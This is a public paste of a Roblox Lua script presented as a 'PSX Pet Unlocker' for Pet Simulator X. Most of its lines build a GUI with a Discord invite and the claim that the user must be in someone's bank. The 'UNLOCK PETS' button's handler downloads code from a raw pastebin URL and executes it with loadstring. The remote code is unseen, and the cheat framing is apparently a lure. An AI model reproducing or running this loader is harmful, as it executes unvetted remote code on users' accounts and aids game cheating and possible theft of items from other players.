LUA   29
PSX UNLOCKER PET BANK
Guest on 2nd February 2023 04:05:32 PM


  1. -- Gui to Lua
  2. -- Version: 3.2
  3.  
  4. -- Instances:
  5.  
  6. local ScreenGui = Instance.new("ScreenGui")
  7. local Frame = Instance.new("Frame")
  8. local UICorner = Instance.new("UICorner")
  9. local Frame_2 = Instance.new("Frame")
  10. local UICorner_2 = Instance.new("UICorner")
  11. local TextLabel = Instance.new("TextLabel")
  12. local ButtonNext = Instance.new("TextButton")
  13. local UICorner_3 = Instance.new("UICorner")
  14. local TextLabel_2 = Instance.new("TextLabel")
  15. local TextLabel_3 = Instance.new("TextLabel")
  16. local UICorner_4 = Instance.new("UICorner")
  17. local TextLabel_4 = Instance.new("TextLabel")
  18. local UICorner_5 = Instance.new("UICorner")
  19. local ImageButton = Instance.new("ImageButton")
  20. local UICorner_6 = Instance.new("UICorner")
  21. local Frame_3 = Instance.new("Frame")
  22. local UICorner_7 = Instance.new("UICorner")
  23. local TextLabel_5 = Instance.new("TextLabel")
  24. local UICorner_8 = Instance.new("UICorner")
  25.  
  26. --Properties:
  27.  
  28. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  29. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  30.  
  31. Frame.Parent = ScreenGui
  32. Frame.BackgroundColor3 = Color3.fromRGB(120, 93, 254)
  33. Frame.Position = UDim2.new(0.384080857, 0, 0.272839516, 0)
  34. Frame.Size = UDim2.new(0, 662, 0, 402)
  35. Frame.Active = true
  36. Frame.Draggable = true
  37.  
  38. UICorner.CornerRadius = UDim.new(0, 4)
  39. UICorner.Parent = Frame
  40.  
  41. Frame_2.Parent = Frame
  42. Frame_2.BackgroundColor3 = Color3.fromRGB(94, 73, 200)
  43. Frame_2.Position = UDim2.new(0.0392749235, 0, 0.189054728, 0)
  44. Frame_2.Size = UDim2.new(0, 609, 0, 311)
  45.  
  46. UICorner_2.Parent = Frame_2
  47.  
  48. TextLabel.Parent = Frame_2
  49. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  50. TextLabel.BackgroundTransparency = 1.000
  51. TextLabel.Position = UDim2.new(0.320197046, 0, 0.903536975, 0)
  52. TextLabel.Size = UDim2.new(0, 270, 0, 30)
  53. TextLabel.Font = Enum.Font.LuckiestGuy
  54. TextLabel.Text = "discord.gg/psx-scripts"
  55. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  56. TextLabel.TextSize = 14.000
  57.  
  58. ButtonNext.Name = "ButtonNext"
  59. ButtonNext.Parent = Frame_2
  60. ButtonNext.BackgroundColor3 = Color3.fromRGB(74, 58, 161)
  61. ButtonNext.Position = UDim2.new(0.377668321, 0, 0.405144691, 0)
  62. ButtonNext.Size = UDim2.new(0, 200, 0, 65)
  63. ButtonNext.Font = Enum.Font.LuckiestGuy
  64. ButtonNext.Text = "UNLOCK PETS"
  65. ButtonNext.TextColor3 = Color3.fromRGB(0, 0, 0)
  66. ButtonNext.TextScaled = true
  67. ButtonNext.TextSize = 14.000
  68. ButtonNext.TextWrapped = true
  69. ButtonNext.MouseButton1Down:connect(function()
  70.         loadstring(game:HttpGet("https://pastebin.com/raw/82RVBrYJ",true))()
  71. end)
  72.  
  73. UICorner_3.Parent = ButtonNext
  74.  
  75. TextLabel_2.Parent = Frame_2
  76. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  77. TextLabel_2.BackgroundTransparency = 1.000
  78. TextLabel_2.Position = UDim2.new(0.377668321, 0, 0.0482315123, 0)
  79. TextLabel_2.Size = UDim2.new(0, 200, 0, 34)
  80. TextLabel_2.Font = Enum.Font.LuckiestGuy
  81. TextLabel_2.Text = "U MUST BE IN SOMEONES BANK!!!"
  82. TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
  83. TextLabel_2.TextScaled = true
  84. TextLabel_2.TextSize = 14.000
  85. TextLabel_2.TextWrapped = true
  86.  
  87. TextLabel_3.Parent = Frame
  88. TextLabel_3.BackgroundColor3 = Color3.fromRGB(94, 73, 200)
  89. TextLabel_3.Size = UDim2.new(0, 662, 0, 66)
  90. TextLabel_3.Font = Enum.Font.FredokaOne
  91. TextLabel_3.Text = " "
  92. TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
  93. TextLabel_3.TextScaled = true
  94. TextLabel_3.TextSize = 10.000
  95. TextLabel_3.TextWrapped = true
  96. TextLabel_3.TextYAlignment = Enum.TextYAlignment.Bottom
  97.  
  98. UICorner_4.CornerRadius = UDim.new(0, 4)
  99. UICorner_4.Parent = TextLabel_3
  100.  
  101. TextLabel_4.Parent = TextLabel_3
  102. TextLabel_4.BackgroundColor3 = Color3.fromRGB(94, 73, 200)
  103. TextLabel_4.Position = UDim2.new(0.0271903332, 0, 0, 0)
  104. TextLabel_4.Size = UDim2.new(0, 644, 0, 66)
  105. TextLabel_4.Font = Enum.Font.FredokaOne
  106. TextLabel_4.Text = "PSX-Pet-Unlocker"
  107. TextLabel_4.TextColor3 = Color3.fromRGB(0, 0, 0)
  108. TextLabel_4.TextScaled = true
  109. TextLabel_4.TextSize = 10.000
  110. TextLabel_4.TextWrapped = true
  111. TextLabel_4.TextYAlignment = Enum.TextYAlignment.Bottom
  112.  
  113. UICorner_5.CornerRadius = UDim.new(0, 4)
  114. UICorner_5.Parent = TextLabel_4
  115.  
  116. ImageButton.Parent = TextLabel_3
  117. ImageButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  118. ImageButton.Position = UDim2.new(0.0151057402, 0, -0.00542750489, 0)
  119. ImageButton.Size = UDim2.new(0, 75, 0, 66)
  120. ImageButton.Image = "http://www.roblox.com/asset/?id=12355201329"
  121.  
  122. UICorner_6.CornerRadius = UDim.new(0, 4)
  123. UICorner_6.Parent = ImageButton
  124.  
  125. Frame_3.Parent = Frame
  126. Frame_3.Active = true
  127. Frame_3.BackgroundColor3 = Color3.fromRGB(71, 56, 156)
  128. Frame_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
  129. Frame_3.Position = UDim2.new(0.0221161395, 0, 0.270808131, 0)
  130. Frame_3.Size = UDim2.new(0, 89, 0, 51)
  131.  
  132. UICorner_7.Parent = Frame_3
  133.  
  134. TextLabel_5.Parent = Frame_3
  135. TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  136. TextLabel_5.BackgroundTransparency = 1.000
  137. TextLabel_5.Position = UDim2.new(0, 0, -0.00619208813, 0)
  138. TextLabel_5.Size = UDim2.new(0, 89, 0, 54)
  139. TextLabel_5.Font = Enum.Font.FredokaOne
  140. TextLabel_5.Text = "MAIN"
  141. TextLabel_5.TextColor3 = Color3.fromRGB(0, 0, 0)
  142. TextLabel_5.TextScaled = true
  143. TextLabel_5.TextSize = 14.000
  144. TextLabel_5.TextWrapped = true
  145.  
  146. UICorner_8.Parent = TextLabel_5

Raw Paste

Login or Register to edit or fork this paste. It's free.